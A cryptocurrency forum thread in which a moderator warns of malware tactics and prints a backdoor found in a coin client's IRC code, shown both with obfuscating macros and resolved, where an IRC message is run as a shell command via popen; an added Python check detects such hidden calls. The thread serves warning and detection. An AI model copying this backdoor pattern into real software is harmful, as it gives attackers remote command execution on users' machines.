Author Topic: Beware of Increasingly Sophisticated Malware Infection Attempts  (Read 118396 times)
grue
Global Moderator
Legendary
*
Offline Offline

Activity: 2016



View Profile
January 25, 2015, 10:33:22 PM
 #1

In the past months, malware infection attempts on this forum have become increasingly sophisticated. Below is a summary of infection techniques that I have encountered. With the most sophisticated attacks, common sense and virus scans are no longer sufficient to ensure safety.

"latest wallet"/"custom wallet"/"faster miner"
A newbie asks for the latest wallet, or wallet that doesn't have any tx fees, or the latest/fastest miner, and the attacker posts his in response. This type of attempt usually gets spotted pretty quickly.

Copied/new ANN
The attacker creates a new ANN topic and posts a malware link as the wallet (or a legit one and changes it to a malware one later).

Replacing links in quotes
The attacker quotes a legitimate post containing a download link written by the real developer (usually the OP or an update post) and changes the link within the quote to a malware link.

Compromised dev account
The developer account (usually responsible for making the OP) is compromised and a "mandatory update" is posted. This usually happens with old/abandoned coins so the real developer isn't there to notice the rogue update.

Packed/FUD executables
In most of the cases above, the malware has little to no detections on VirusTotal. This is because any script kiddie can pay $30 and have their malware crypted, rendering it fully undetectable.

Modified source with backdoor
This was recently brought to my attention via a user report. A newbie, under the guise of reviving a coin, posted a new client along with source. However, the source was modified to include a backdoor in the IRC bootstrapping mechanism.
Here is the relevant source code:
Code:
if (vWords[1] == CBuff && vWords[3] == ":!" && vWords[0].size() > 1)
{
    CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        std::string result = "";
        while (!feof(buf))
            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;
        CFree(buf);
        strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
        if (strchr(pszName, '!'))
            *strchr(pszName, '!') = '\0';
        Send(hSocket, strprintf("%s %s :%s\r", CBuff, pszName, result.c_str()).c_str());
    }
}
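Here is the source code with macros resolved:
Code:
// Trigger: an IRC PRIVMSG whose text starts with the token ":!"
if (vWords[1] == "PRIVMSG" && vWords[3] == ":!" && vWords[0].size() > 1)
{
    // The rest of the received line is passed to popen(), i.e. run as a shell command
    FILE *buf = popen(strstr(strLine.c_str(), vWords[4].c_str()), "r");
    if (buf) {
        std::string result = "";
        // Collect the command's output
        while (!feof(buf))
            if (fgets(pszName, sizeof(pszName), buf) != NULL)
                result += pszName;
        pclose(buf);
        // Take the sender's nick from the message prefix (":nick!user@host")
        strlcpy(pszName, vWords[0].c_str() + 1, sizeof(pszName));
        if (strchr(pszName, '!'))
            *strchr(pszName, '!') = '\0';
        // Send the collected output back to the sender as a PRIVMSG
        Send(hSocket, strprintf("%s %s :%s\r", "PRIVMSG", pszName, result.c_str()).c_str());
    }
}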
The code was part of the initial commit, so it would be difficult to notice the addition of the code by casual inspection. Also, this would likely not show up on any virus scans.

It is pitch black. You are likely to be eaten by a grue.
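
An audit check for the macro-hidden popen call shown in the post above, as an added example that is not part of the original thread: it resolves simple #define aliases in C/C++ source and reports any call that ends up at a command-execution function. The #define lines in the sample are constructed (the thread shows only the macro names and what they resolve to), and the function names and the list of risky calls are this example's own assumptions.

```python
import re

# Process-execution calls that P2P/IRC networking code has no reason to make
# (assumed list for this example; extend it for the code base being reviewed).
RISKY = {"popen", "_popen", "system", "execl", "execlp", "execv", "execvp",
         "WinExec", "ShellExecuteA", "CreateProcessA"}

# Object-like macros that rename one identifier to another: "#define CRead popen".
# Function-like macros and token pasting are not handled here.
DEFINE = re.compile(r"^[ \t]*#[ \t]*define[ \t]+(\w+)[ \t]+(\w+)[ \t]*$", re.M)
CALL = re.compile(r"\b(\w+)\s*\(")

def resolve_aliases(source):
    """Map every alias macro to the identifier it finally expands to."""
    direct = dict(DEFINE.findall(source))
    resolved = {}
    for name in direct:
        target, seen = name, set()
        while target in direct and target not in seen:  # follow chains, stop on cycles
            seen.add(target)
            target = direct[target]
        resolved[name] = target
    return resolved

def find_hidden_exec(source):
    """Return (line_no, name_as_written, real_function) for each risky call."""
    aliases = resolve_aliases(source)
    hits = []
    for line_no, line in enumerate(source.splitlines(), 1):
        if line.lstrip().startswith("#"):  # skip the preprocessor lines themselves
            continue
        for name in CALL.findall(line):
            real = aliases.get(name, name)
            if real in RISKY:
                hits.append((line_no, name, real))
    return hits

# Constructed sample: the call line is from the post, the #define lines are assumed.
SAMPLE = '''\
#define CRead popen
#define CFree pclose
#define CLine FILE
CLine *buf = CRead(strstr(strLine.c_str(), vWords[4].c_str()), "r");
if (buf) { CFree(buf); }
'''

if __name__ == "__main__":
    for line_no, name, real in find_hidden_exec(SAMPLE):
        print(f"line {line_no}: {name}() resolves to {real}()")
```

In a real tree the defines usually live in a header, so feed the check the concatenated headers and sources (or the preprocessor output) rather than one file at a time.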

Rolandvoda
Member
**
Offline Offline

Activity: 109


View Profile
January 29, 2015, 05:10:56 AM
 #2

Could you please post the coin's name and maybe others that you may have found?
muhrohmat
Sr. Member
****
Offline Offline

Activity: 252


View Profile
January 31, 2015, 07:33:18 AM
 #3

Correct me if I'm wrong, but malware is generally for executables in Windows, no? I mean, the wallets are, but is Kaspersky not enough?
If not, why do we need to protect from the case of retrieving passwords from the users and other stuff from even pen drives with wallets (including the common coin ones) like DOGE, LTC, BTC and a few more?

garmin
Hero Member
*****
Offline Offline

Activity: 499


View Profile
February 03, 2015, 12:08:47 AM
 #4

I was checking some IRC bootstrap connections and found some additional info.

Kinda looks ripe for the picking by an exploit.

https://bitcointalk.org/index.php?topic=943519.new#new

crazyideas21
Jr. Member
*
Offline Offline

Activity: 33

Researcher at Univ of California San Diego


View Profile WWW
February 11, 2015, 12:45:31 AM
 #5

I'm adding this to the list of possible scams:

https://bitcointalk.org/index.php?topic=951827.0
TrinityCoin
Sr. Member
****
Offline Offline

Activity: 264


View Profile
February 11, 2015, 04:31:57 AM
 #6

Could you please post the coin's name and maybe others that you may have found?

This is found in the "Lucky7coin" source code, as linked above.

shavers
Sr. Member
****
Offline Offline

Activity: 342



View Profile
February 14, 2015, 10:04:48 PM
 #7

I'd like to add bitcoinwisdomapp.com to the blacklist. There's a keylogger behind it.

But how will you ever die, Narcissus, when you have no mother?
Hippie Tech
aka Amenstop
Legendary
*
Offline Offline

Activity: 1456


All cryptos are FIAT digital currency. Do not use.


View Profile WWW
February 17, 2015, 05:40:48 AM
 #8

Any thoughts?

EDIT
SPR, ORB and at least one or two other coins are using this faucet/block explorer site.

BE VERY WARY OF THE MULTIFAUCET BLOCK EXPLORER!

I searched for an address and was left with having to fight virus scan pop-ups for a few minutes.







crazyideas21
Jr. Member
*
Offline Offline

Activity: 33

Researcher at Univ of California San Diego


View Profile WWW
February 17, 2015, 05:54:00 AM
 #9

The multifaucet.tk wallet search would redirect you to a third-party ad network. Subsequently, the ad network would redirect you to the destination page -- which, in this case, is the result of the wallet search. I'm in California; the ad network being shown is adf.ly. Depending on your geographic location, you may get a different ad network. These third-party sites generate revenue for multifaucet upon every ad view. This is paid for by the ad publisher. However, multifaucet has no control of what ads are being shown. To maximize their profits, ad publishers may show ads that may lead to malware, which promises higher margins than conventional ads.

In my case, I encountered the following page:

Hippie Tech
aka Amenstop
Legendary
*
Offline Offline

Activity: 1456


All cryptos are FIAT digital currency. Do not use.


View Profile WWW
February 17, 2015, 06:04:20 AM
 #10

In my case, IE11 was completely locked up and I had to be fast with the "end process" clicks.

I've never had my browser hijacked like this. That is unless we count AMD's user surveys they keep imposing on us after a driver install. lol

Gabe
Jr. Member
*
Offline Offline

Activity: 36


View Profile
February 18, 2015, 07:30:11 PM
 #11

That's terrible. Have any of you encountered the ransom cryptolocker? I heard about it not long ago. What is wrong with people?
fartbags
Legendary
*
Offline Offline

Activity: 1176


View Profile
March 03, 2015, 01:18:57 AM
 #12

Would running each wallet/miner in a different virtual machine with virtualbox prevent the effects of this kind of malware?

crazyideas21
Jr. Member
*
Offline Offline

Activity: 33

Researcher at Univ of California San Diego


View Profile WWW
March 03, 2015, 01:23:24 AM
 #13

Would running each wallet/miner in a different virtual machine with virtualbox prevent the effects of this kind of malware?

Yes, that would be one solution.
Decksperiment
Sr. Member
****
Offline Offline

Activity: 364


Uniting the Power of Sound & Ceation


View Profile
March 03, 2015, 04:14:52 AM
 #14

Wow.. this is like so pointless (not the thread, the 'hack') nowadays.. why not just place a keylogger in bios, then no matter what os folks use, you have 100% access to whatever machines are connected?

Edit: Hint: Speedracer.

BTC: 1654DECHaU4QyYXom9ooRBvt2zmULR3MfZ
dooglus
Legendary
*
Offline Offline

Activity: 2310



View Profile
March 08, 2015, 07:37:28 PM
 #15

Edit: Hint: Speedracer.

http://events.ccc.de/congress/2014/Fahrplan/system/attachments/2565/original/speed_racer_whitepaper.pdf

bitsat alien
Full Member
***
Offline Offline

Activity: 122


View Profile
March 13, 2015, 06:32:45 AM
 #16

Thanks for being on top of this and keeping us informed, we do appreciate it!
Decksperiment
Sr. Member
****
Offline Offline

Activity: 364


Uniting the Power of Sound & Ceation


View Profile
March 13, 2015, 04:03:26 PM
 #17


Lol, this was just the beginning. If I can put a keylogger in my 64mb lappy bios.. I can do it with anyone..

Keep in mind this hack was released solely by them to LOCKDOWN your bios so you can't tamper with overclocking your machine.. the security they released after this demonstration is exactly how they get into your bios as only the NSA would LOVE.

Edit: There is need for a new style of bios security, like anti virus, which, when your bios gets bigger, can load in bios FIRST, before bios is loaded.. it's not as hard as you think, but I'm not THAT good..

BTC: 1654DECHaU4QyYXom9ooRBvt2zmULR3MfZ
AshCoiner
Newbie
*
Offline Offline

Activity: 10


View Profile
March 31, 2015, 03:52:25 AM
 #18

I just received something like this an hour ago. I was surfing eBay and laughed when I saw PimpCash. Having to see if it was real, I went to pimpcash.com. Immediately something like what you showed came up. However, for me, it pretended to be my service provider and gave me a number to call. I confess I did try to call but the ring didn't sound right. Sounded like an old telephone. I hung up and rebooted my computer. Things seem to be ok now. I ran a quick scan and all seems to be okay. Is there anything else I should do to check to see if my computer is okay?

Any thoughts?

EDIT
SPR, ORB and at least one or two other coins are using this faucet/block explorer site.

BE VERY WARY OF THE MULTIFAUCET BLOCK EXPLORER!

I searched for an address and was left with having to fight virus scan pop-ups for a few minutes.
Hippie Tech
aka Amenstop
Legendary
*
Offline Offline

Activity: 1456


All cryptos are FIAT digital currency. Do not use.


View Profile WWW
April 01, 2015, 11:39:02 PM
 #19

Please check your "program files(x86)" and the youruser/appdata/local/TEMP folders! The ASN client is a remote desktop hack!

https://bitcointalk.org/index.php?topic=984878.msg10951987#msg10951987




ed_teech
Hero Member
*****
Offline Offline

Activity: 506


Jahaha


View Profile
April 10, 2015, 09:22:12 PM
 #20

Thanks, this was very informative. I guess this forum is a big target for malware developers who want to steal easy crypto money.